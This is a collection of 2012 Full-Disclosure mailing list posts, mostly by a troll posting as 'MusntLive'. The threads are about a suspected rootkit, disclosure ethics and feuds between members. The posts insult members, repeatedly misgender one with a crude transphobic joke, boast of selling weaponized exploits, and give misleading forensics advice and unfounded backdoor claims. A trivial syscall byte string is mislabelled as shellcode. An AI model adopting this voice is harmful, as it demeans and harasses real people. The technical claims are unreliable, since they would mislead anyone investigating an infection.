On Thu, Jul 12, 2012 at 1:02 PM, phocean <0...@phocean.net> wrote: > Not sure if you are kidding. > > 1) WinDBG is a debugger, not really memory dump. > 2) Not sure to understand* > 3) It is your opinion. > 4) Don't understand. Sounds like a joke, but even with that angle I don't > get it.* > > * If only you stopped with this weird english. > > --- phocean 0x00: MustntLive is now give up 1) I hope Dmitry Vostokov is never read this 2) Is obvious you don't 3) MusntLive is never make opinion is always fact 4) Is repeat 2. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)
On Thu, Jul 12, 2012 at 12:47 PM, phocean <0...@phocean.net> wrote: > Yes, maybe WinDbg… Not that I am confortable with WinDBG, but certainly a > good chance to learn and get more familiar. > > However: > > - Volatility: anything has to sit somehow in the memory, so there is no way > for it to escape from the analysis. It has all advantages of offline > analysis. I don't think Volatility is script kiddy stuff. I think it is a > great tool and should be enough for my concern. > > - WinDBG: here we are doing live analysis, with all the difficulties it > implies. It is long and painful. You have to read damn a lot of assembly, > thousands of calls, decide to step into or step over, when and based on what > assumptions, etc. > Of course, perfect knowledge of the system internals is required. Difficulty > will be raised if ever there are some anti-debugging protections. Respect to > the people who can do it, they are artists, but is it really the most > reasonable way to go? 0x00: MusntLive is give you now priceless advice for you must to listen: 1) WinDBG is to dump your memory 2) Is HB Gary FD Pro is used not volatility. This is because since Greg is backdoored all his tools, is we don't find problems, then when is HB Gary snooping in our session maybe they can find is problem for us. 3) Volatility is script kid tool (don't is tell anyone who is use this) 4) Step over is step into. MusntLive give you good analogy right now. Is you have choice, step into POOP or is step over POOP is what is your choice? Step over is what is hoped. Forget this is step over, into, above, sideways. Foolproof is method is to diff memory. Before and is after yes. This is key to anomalies: Before and is after ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)
On Thu, Jul 12, 2012 at 12:09 PM, phocean <0...@phocean.net> wrote: > Could you elaborate please? > What that I haven't done yet? If we agree there is nothing in the RAM dump, > how can we explain the artefacts? > > Musntlive, I never trust any antivirus. > > --- phocean 0x00: MusntLive will always help you. .effmach x86 (or is whatever is your machine amd64, ia64) is your first friend. When you is run this, you come back and let MusntLive know. For then we must use !dml_proc and only is real hacker debug stuff. No script kid stuff. Only for when you is know WinDBG like is back of your hand is you Windows hacker. Not is Immunity or is Olly, this is these are for is how you say rookie. Now you is go dump with is effmach. Then is we can study this is yes with HB Gary memory tools. Because is HB Gary, if we know is find it, HB Gary is will find with is their backdoor into is their tools. We not worry, we find evil 1337 together. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)
On Thu, Jul 12, 2012 at 9:57 AM, phocean <0...@phocean.net> wrote: > The only antivirus I have tried so far is Microsoft Security Essentials. And > it finds nothing, which I certainly don't trust at all. > Especially because it shows a very unusual certificate alert during the > setup. > I also scanned a few files that I chose (some dll and services) on > VirusTotal with no results except some false positive. I also had a look on > the disassembly of these files. > So, I don't know what it is, but if it is a rootkit it is not a trivial one > and I am afraid it is smarter than me :) > > --- phocean > 0x00 you say: "The only antivirus I have tried so far is Microsoft Security Essentials." and this is why you're obvious fail. Everyone knows only is Kaspersky and F-Secure is find any virus. They is after all discover Flame single-handedisly. I just checked your machine for you. You are is safe. Stay thirsty my friend ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
On Wed, Jul 11, 2012 at 3:04 PM, Jeffrey Walton wrote: > On Wed, Jul 11, 2012 at 2:58 PM, Григорий Братислава > wrote: >> On Wed, Jul 11, 2012 at 1:45 PM, Gary E. Miller wrote: >> >>>> And is you say my logic is wrong. >>> >>> Yup. >> Then is now safe to say, you is a guardian of pedos based on is your logic. > Hmmm That's quite a leap. Negative. Go back to is original message I post: So according to is your logic: MusntLive discover pedo, report pedo, authorities lallygag, MusntLive publicize pedo info, MusntLive is evil. MusntLive discover is Lockheed has glitch on plane cause pilot to crash, MusntLive publish information so to for pilots can know, MusntLive is evil for exposure. MusntLive discover is flaw in mechanism that shut down power grid, rush to warn people via full disclosure, MusntLive is evil. Gary is say I am evil to follow is my logic. Logic for disclosing pedos? Gary: Psych 101: Evil people have no shame. Me: And is you say my logic is wrong. Gary: Yup. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
On Wed, Jul 11, 2012 at 1:45 PM, Gary E. Miller wrote: >> And is you say my logic is wrong. > > Yup. > > RGDS > GARY Then is now safe to say, you is a guardian of pedos based on is your logic. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
http://www.youtube.com/watch?v=qggxTtnKTMo On Wed, Jul 11, 2012 at 12:41 PM, Dave wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > List is I read for education, now is I read for much entertaining. > > Please, no more post till popcorn supply is better. > > white hat = kiss corporate ass > black hat = kiss own ass > grey hat = kiss which ever ass look best. > > All corps fuck the people. No altruism in making share holder rich. > > Conscience be guide to disclosure method, all different, wrong if different > to you, right if same as you. > Same old shit of bull. All depend on childhood programming/indoctrination. > > Few people genuinely innocent. If can recognise innocent hurt them not, fuck > the rest before fuck you first. > > Jiminy Cricket is guide must be. > > Peace love and chicken fajitas for life too short for big seriousness. > > > > > > > On 11/07/2012 17:03, Григорий Братислава wrote: >> Is bug you yes is because you is cannot ID me? I'd like to warn you >> and Full Disclosure!! !! !! "MusntLive is not play by dox games" >> >> >> On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave wrote: >>> Same has to you: fake ouzbek or real yankee? In regard of you degenerate I >>> bet yankee. >>> Choose which has to be and stick language. You understand? >>> >>> >>> From: Григорий Братислава >>> To: Laurelai >>> Cc: full-disclosure@lists.grok.org.uk >>> Sent: Wednesday, July 11, 2012 5:56 PM >>> >>> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] >>> How much time is appropriate for fixing >>> >>> Obligatory question is to must remain politically correct: "When I is >>> respond to you, am I to address is Wesley or Laurelai?" Not only is >>> you confused, you is has everyone confused. MusntLive is reserve the >>> right to dish out equal opportunity flames and is not want to address >>> you as Ms. if you are still a he. >>> >>> >>> On Wed, Jul 11, 2012 at 11:48 AM, Laurelai wrote: >>> >>>> http://www.youtube.com/watch?v=m_mDTLphIVY >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> >> >> >> > > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.2 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iQEVAwUBT/2s0LIvn8UFHWSmAQLNzwgAgCzSRk56LmFxJmHetswe+sNBQx62WXpD > VLhSkfEXFr6lWmTAUKksfK+XPp2ZJ3cLU4ZMcpm5sTupCqs+13cbTCr/UhF/YQvI > YJrD0u3S9l2hRWBelqKjAvqVQUUbtfSolK4jNfB72eNMdzDgJa2safcTQu4qva/W > 8GdRVOGvgtB+vfsJMmIlcqqtRBlx4yezCaFepTGaHXB4qd9jem/oCuLQjdS0MgkH > vBhVmLUOMf7cYODmMYyXjGWSQqd7hrLHcHychFZQBJxNq178M5K739H2tOsicvy8 > 2Bp1oakSg53pL3+XCVekCxEGo7YdAgR1dacmNBDFj3ofgXz8qn0egQ== > =JUoJ > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
Is penis envy? Even is I waste my time on CEH is likely still a) make is more money than you with or is without cert b) is would have accomplished something is versus nothing c) is prove that MusntLive annoy you so muchso, that you is prove to MusntLive and list is you really have no friends. MusntLive take care of everyone including you: http://www.amazon.com/Friends-The-Complete-Series-Collection/dp/B000H6SXMY/ref=sr_1_1?ie=UTF8&qid=1342022651&sr=8-1 Is you do not have to be lonely anymore. You can has friends every times. On Wed, Jul 11, 2012 at 12:19 PM, NETT Dave wrote: > Me has LOL. > Has spot you: > http://40kegger.blogspot.fr/2012/03/i-am-lazy-lazy-man.html > Dave has joke but maybe true. > Anyway you has to be one of those who read about FD in one of those > "hacking: hands on" or "hacker's guide" on Amazon. Or just passed your CEH! > Please has respect of Dave and Dave has soon respect of you. No problem with > you, fun, yes, very true. > > > > From: Григорий Братислава > To: NETT Dave > Cc: Laurelai ; "full-disclosure@lists.grok.org.uk" > > Sent: Wednesday, July 11, 2012 6:03 PM > Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] > How much time is appropriate for fixing > > Is bug you yes is because you is cannot ID me? I'd like to warn you > and Full Disclosure!! !! !! "MusntLive is not play by dox games" > > > On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave wrote: >> Same has to you: fake ouzbek or real yankee? In regard of you degenerate I >> bet yankee. >> Choose which has to be and stick language. You understand? >> >> >> From: Григорий Братислава >> To: Laurelai >> Cc: full-disclosure@lists.grok.org.uk >> Sent: Wednesday, July 11, 2012 5:56 PM >> >> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] >> How much time is appropriate for fixing >> >> Obligatory question is to must remain politically correct: "When I is >> respond to you, am I to address is Wesley or Laurelai?" Not only is >> you confused, you is has everyone confused. MusntLive is reserve the >> right to dish out equal opportunity flames and is not want to address >> you as Ms. if you are still a he. >> >> >> On Wed, Jul 11, 2012 at 11:48 AM, Laurelai wrote: >> >>> http://www.youtube.com/watch?v=m_mDTLphIVY >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> > > > > -- > > `Wherever I is go - there am I routed` > > -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Immersive Endpoint Devices
Lucky is for Jack and CTU, 24 is was cancelled. Thank you is Dario! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
Is bug you yes is because you is cannot ID me? I'd like to warn you and Full Disclosure!! !! !! "MusntLive is not play by dox games" On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave wrote: > Same has to you: fake ouzbek or real yankee? In regard of you degenerate I > bet yankee. > Choose which has to be and stick language. You understand? > > ________ > From: Григорий Братислава > To: Laurelai > Cc: full-disclosure@lists.grok.org.uk > Sent: Wednesday, July 11, 2012 5:56 PM > > Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] > How much time is appropriate for fixing > > Obligatory question is to must remain politically correct: "When I is > respond to you, am I to address is Wesley or Laurelai?" Not only is > you confused, you is has everyone confused. MusntLive is reserve the > right to dish out equal opportunity flames and is not want to address > you as Ms. if you are still a he. > > > On Wed, Jul 11, 2012 at 11:48 AM, Laurelai wrote: > >> http://www.youtube.com/watch?v=m_mDTLphIVY > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
On Wed, Jul 11, 2012 at 11:57 AM, Laurelai wrote: > > I repeat: That is good. We all is repeat now also: "Is we are to address you as Miss, Ms. or is you not get kielbasa lopped yet?" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] has Thor big ego, has Thor long boring messages
Upset him (Dave Nett) is he has no friends. For the record, MusntLive discovered many vulnerabilites. MusntLive is not mediawhore, MusntLive weaponize exploits for sale on ebay0day to highest bidder. Make me enough for to buy enough! On Wed, Jul 11, 2012 at 11:22 AM, wrote: > On Tue, 10 Jul 2012 23:38:49 -0700, NETT Dave said: > >> Please has us let peace: has you shut up. > > procmail is your friend. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
Obligatory question is to must remain politically correct: "When I is respond to you, am I to address is Wesley or Laurelai?" Not only is you confused, you is has everyone confused. MusntLive is reserve the right to dish out equal opportunity flames and is not want to address you as Ms. if you are still a he. On Wed, Jul 11, 2012 at 11:48 AM, Laurelai wrote: > http://www.youtube.com/watch?v=m_mDTLphIVY ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
On Wed, Jul 11, 2012 at 10:40 AM, Mikhail A. Utin wrote: > Dear Paul, > You completely missed my point. I was talking about the foundation of this > list, which is free service, and the foundation of a lot of current IT > technologies, which is freeware. Giving knowledge for free (including > software bugs) is the foundation of this civilization. Having profit is a > necessity but not all what drives us. Could you personally show any your > contribution to the society? Which was not paid for? > My contribution you can find searching/google for my name and "article", and > DeepSec 2011 and OWASP AppSec DC 2012 presentations as well. Nobody paid me > for. Plus, you can check our portal www.201cmr1700ma.com, which provides > knowledge and security documents for free. Then, considering you association > with math science, you can possibly estimate the time I've spent for free. > So, my voice pro free knowledge distribution is completely legitimate. > Hello Full-Disclosure!! !! !! Is like to warn you about is word "free." Is electricity free? No, you is pay to use your ISP, your electricity. Therefore, free is overabuse use of word. Is we now describe free research to mean: "Out of pocket vulnerability!" Is where is RFP when is needed most? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
On Wed, Jul 11, 2012 at 9:03 AM, Georgi Guninski wrote: > just check m$ business practices. You i$ mu$t be on undernet hackphreak still ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
On Tue, Jul 10, 2012 at 6:40 PM, wrote: > Are you familiar with Georgi's work? Please look at his website before > proffering opinions. > Is must be an old man thing. No one is use VAX/VMS is only people like parmaster (oh hai Jason Snitker) is use VAX to make is themselves look three is one three three seven for IRC monkeys. "Oh hai, is look I know VAX because is US government is use mind control on me" (http://www.raven1.net/mcf/v/snitker.htm) Guninski is washed up. Like is Japanese debris hit California right now. And is you too is washed up. No one is use punch card no more. Georgi is no one special lest is only to himself in mirror. Now is you talking Dan Kaminski, Dan is God! Only when he is not drunk and sappy over is "red pill blue pill" man. (Rutkowska). You is say Dan, I say all the way! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
On Tue, Jul 10, 2012 at 5:48 PM, Gary E. Miller wrote: > > Maybe, but my real world example shows your simplistic logic is wrong. > Is say who? > > Psych 101: Evil people have no shame. > And is you say my logic is wrong. You: "If you become a whistleblower, you are evil for disclosing the danger. How dare you post information on a vulnerability before allowing the vendor to fix the issue. Lives are at stake, people are in real danger!" Is vendor have their act together, is problem never leave prior to "test use cases" in Dev and Q&A. Where is responsibility of vendor lie? Vendor is solely care to make money not is churn out fixes. So according to is your logic: MusntLive discover pedo, report pedo, authorities lallygag, MusntLive publicize pedo info, MusntLive is evil. MusntLive discover is Lockheed has glitch on plane cause pilot to crash, MusntLive publish information so to for pilots can know, MusntLive is evil for exposure. MusntLive discover is flaw in mechanism that shut down power grid, rush to warn people via full disclosure, MusntLive is evil. Nice logic is there in your thinking. Perhaps maybe to if you are in Poland. Is I discover flaw, what is make you think no one else is has discover flaw. According to your is logic: "sit around and wait for the responsible vendor to fix it. In the meantime worry little about the dozens of other attackers that likely know about the flaw and are actively exploiting it!" Nice logic Gary. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
On Tue, Jul 10, 2012 at 4:37 PM, Gary E. Miller wrote: > Yo Thor! > > On Tue, 10 Jul 2012 19:58:16 + > "Thor (Hammer of God)" wrote: > >> People do not disclose their research to make >> the world a better place. They do it for recognition or for money. > > I would argue there is a 3rd reason. Self defense. I and others have > had issues of our servers being attacked by unkown evil doers. To keep > our servers running we need to reverse engineer the hack and get the > bug fixed or the attack vector blocked. Until '* Disclosure' in its many > aspects was common it was virtually impossible to get vendors to fix > open holes being actively used by attackers. The public shaming of > '* Disclosure' large companies found denial a very easy and cheap > resonse to bugs that were killing us. > Poor argument. If you is smart enough to is reverse engineer the threat, why can't you forward engineer a fix and post it publicly so that is others don't get hacked. E.G (using my Bejtlich is accent: "We are being attacked from China obviously. This is how they are attacking, this is what they are affecting, this is what we did to get it fixed. Patch yourself before is evil Chinese attack you too! Otherwise, wait for vendor to post next patch Tuesday fixes and in is meantime, allow them to roam along your network like is Travelocity Gnome" Public shaming of not only is vendor of shoddy software, but is attacker, is key no one is think about. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
On is serious note concerning "disclosure," people need to is get a dose of reality. When I discover a bug on my own is time, I choose what to do with it. It is my time and effort. I am is obligated to do what I want and feel is relevant to myself. Not some is big corporation who cares little. So much so, they is always distribute beta software to the public. My obligations in life are is to myself. To do what makes me is happy. Is whether is make money off bug, disclose bug to vendor, poke is vendor in eyesocket via full-disclosure, my time, my work. (http://www.youtube.com/watch?v=ngGgy62lMj0) All is petty see-saw over full disclosure, partial disclosure, anonymous disclosure, is old topic. Vendors have a "moral and ethical" ... Nothing. Vendors are in is business to make money. If you are suckered into is buying shoddy equipment over in over, then you are the fool. Not the vendor, not the scriptgenius making exploits for Backtrack, not the marketing conmen at InfoSecInstitute prostituting the disclosure and is so on redundant on and on. In is words of Goodfellas: http://www.hark.com/clips/hvccjrnhfg-business-is-bad-fuck-you-pay-me Is anyone want 1492 exploits is contact me off-list. Government contacts only! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
Arizona is place for Witness Protection. Perhaps is maybe that Sabu is now in Arizona. Nebraska is state for cousinly love and is drink. Also corn. On Tue, Jul 10, 2012 at 3:48 PM, wrote: > On Tue, 10 Jul 2012 15:16:39 -0400, Григорий Братислава said: >> I reply to you is back "on-list." Information is for meant to be free. >> And so you know, is no, your English is improper: > > The longer this thread goes on, the more I become convinced that > one of these guys actually lives in Nebraska and the other in Arizona. ;) -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
I reply to you is back "on-list." Information is for meant to be free. And so you know, is no, your English is improper: You say: "People do not need seeing your arguments" Is correct: "People do not need to READ your comments" Or: "People should not read your comments" Or: "People don't want to read your comments" Is you must, or can, is go back to finish high school. Is maybe in Boston is how you speak that what you call English but you is need remember, in Boston is people say "pock" when they is mean PARK and is also say "cah" when they is mean CAR: http://www.youtube.com/watch?v=RbK4cL3QSc0 Please is stop pollute my inbox with your non-English. On Tue, Jul 10, 2012 at 3:06 PM, Mikhail A. Utin wrote: > Sorry, but it is not misspelling. Man, you definitely need learning modern > English. And do not pollute the list. See, I reply only to you. People do not > need seeing (learn - not "to see") your arguments. > You definitely need acquiring better communication skills. > > M ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
On Tue, Jul 10, 2012 at 2:50 PM, Mikhail A. Utin wrote: > Hey you, > I do what I want to do and support who I want supporting. > If you did not get the idea, it is not my fault. Read again, if you can. > > M Is you misspell "who I want supporting" you is mean to say "who I want to support" is proper English. Next time is take deep breathe, is relax for you to type! Look is not my fault you pick to choose to stay on backdoor kernel. If you don't has clue, please, Amazon is your friend http://www.amazon.com/s/ref=nb_sb_noss_1?url=search-alias%3Daps&field-keywords=clue Is read what again? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
You must is speak for yourself. I is stopped using Linux once Debian is give away root ownership many is times! From now on I is only use the best. BeOS. Is because Theo also have backdoor. On Tue, Jul 10, 2012 at 11:42 AM, Mikhail A. Utin wrote: > Hello, > I completely agree with Thor. We have to do something for free. We have to > contribute, not just use. Whoever and whatever. > Examples: > - This list is ran for free (hardware, software, time, energy are used for) > and giving us a chance to communicate > - The most of us use Linux, whichever flavor you prefer. The most of it is > free time contribution. Somebody pays for that, but we use. > It is nice to be paid for something, but consider the alternative. Otherwise > our communications will die and we do not have an OS for a fun or profit. > > Mikhail Utin > > -Original Message- > From: full-disclosure-boun...@lists.grok.org.uk > [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of > full-disclosure-requ...@lists.grok.org.uk > Sent: Tuesday, July 10, 2012 7:00 AM > To: full-disclosure@lists.grok.org.uk > Subject: Full-Disclosure Digest, Vol 89, Issue 11 > > > -- > Message: 7 > Date: Mon, 9 Jul 2012 17:24:51 + > From: "Thor (Hammer of God)" > Subject: Re: [Full-disclosure] How much time is appropriate for fixing > a bug? > To: Georgi Guninski , Stefan Kanthak > > Cc: "full-disclosure@lists.grok.org.uk" > > Message-ID: > Content-Type: text/plain; charset="Windows-1252" > > I'm not contradicting myself at all - in fact, *you* are the exact type of > person I'm talking about. You couldn't give a rat's ass about the > industry or anyone but yourself. Nothing you have ever done has been > "valuable" to anyone other than you; it has been completely self-serving > egotistical bullshit. > > CONFIDENTIALITY NOTICE: This email communication and any attachments may > contain confidential > and privileged information for the use of the designated recipients named > above. If you are > not the intended recipient, you are hereby notified that you have received > this communication > in error and that any review, disclosure, dissemination, distribution or > copying of it or its > contents is prohibited. If you have received this communication in error, > please reply to the > sender immediately or by telephone at (617) 426-0600 and destroy all copies > of this communication > and any attachments. For further information regarding Commonwealth Care > Alliance's privacy policy, > please visit our Internet web site at http://www.commonwealthcare.org. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
Hello Full Disclosure!! !! !! Is like to warn you about George Guninski. Is cat is out is bag. Guninski is lame PoC char lamur = "\xba\x1c\x00\x00\x00" "\xb9\x00\x00\x00\x00" "\xbb\x01\x00\x00\x00" "\xb8\x04\x00\x00\x00" "\xcd\x80\xb8\x01\x00" "\x00\x00\xcd\x80" /* IS REAL SHELLCODE OLIVE BRANCH FOR YOU*/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Warning is about APT
Hello full disclosure!! !! !! Is like to warn you about APT. APT is mean Association for is Prevention of is Torture. http://www.apt.ch Is musntlive receive email from APT is say to stop using their name for mean malware from China. Is musntlive's best interest to believe is this APT overflow is come from Richard Bejtlich of Taosecurity and Mandiant. Please Richard, is stop say APT so much. If is you must say give space between China and is APT. Everything is not China!! Thank you. Is say hi to Amy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is Flame Malware Disclosure
Hello Full Disclosure!! !! !! Is like warn you about Flame but is you not get hints then is you not understand. Is maybe you reverse is you see. Is thank me in the future ; обман, Спасибо Касперский ??2@YAPAXI@Z proc near var_C= dword ptr -0Ch arg_0= dword ptr 8 pushebp mov ebp, esp sub esp, 0Ch jmp short loc_10036907 Proof: Flame Is begin at 2:35 http://www.youtube.com/watch?v=wR2F9Km5d0w (Seven!) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Metadata exfiltration
`Sudhanshu Chauhan is a researcher at InfoSec Institute. He is in his final year of studies as a B.Tech (CSE). He has completed his Diploma in Cyber Security and has earned certifications in Web Development and Cyber Laws. ` Is this is joke? `completed his Diploma in Cyber Security` is from who he graduate with such diploma? `has earned certifications in Web Development and Cyber Laws.` Earned certification in Cyber Laws` is from who? Ask.com? Web development is from who? Is must be joke. Is long ago, I respect infosecinstitute is now you must merge complete with brainbench to make become new certification of 'Is Secuker to spend your money' ISSYM certification. Is you make competition for ISC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Zombie Processes
Hello is Full Disclosure!! !! !!
Is like to warn you about is Zombie apocalypse. Is only on OpenBSD is
exist zombie process. Is can be seen like how:
ps -xua | awk '$8 == "Z"'
Is musntlive develop process 25 years ago is stop
/*
*
* зомби.c
* musntLive is musnt give away is LUA
* Flamer Kaspersky creation secrets
*
*/
void getMessage(lua_State* L, int idx, void* ptr)
{
*(const char**)ptr = lua_tostring(L, idx);
}
...
lua_CFunction fct;
const char* msg;
lua_genpcall(L, "return print, 'z0mb!3S'",
">%c %k", &fct, getMessage, &msg);
lua_pushstring(L, msg);
fct(L);
Is more information on Zombies
A Pennsylvania woman driving a car with the license plate ZOMBIE is
accused of hitting two pedestrians with her car and then zapping
another man with a stun gun:
http://content.usatoday.com/communities/ondeadline/post/2012/06/zombie-attack-leads-to-arrest-in-pennsylvania/1#.T9dYyrXh-So)
Special ammunition optimised for fighting zombies is selling like hot
cakes in the USA, according to reports, following sensational media
coverage of incidents involving flesh-eating and similar undead-esque
behaviour. http://www.theregister.co.uk/2012/06/11/zombie_bullets/
'Miami zombie' attack autopsy: Ronald Poppo's flesh not found in Rudy
Eugene's stomach
http://www.wptv.com/dpp/news/news_archives/miami-zombie-attack-autopsy-ronald-poppos-flesh-not-found-in-rudy-eugenes-stomach#ixzz1xamf8d9l
Cranberries http://www.youtube.com/watch?v=6Ejga4kJUts
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 3:57 PM, Laurelai wrote: > And you would be wrong. I find right term for you Wesley. Destructive Narcissist http://en.wikipedia.org/wiki/Narcissistic_leadership#Impact_of_healthy_v._destructive_narcissistic_managers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 3:18 PM, Laurelai wrote: > I don't see how Iran developing nuclear power is a threat, I'm sorry to > me this just seems like more fear mongering. And is this how you fail. There is no problem is in developing nuclear POWER there is problem when you is weaponize it. You need is go back to school. -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
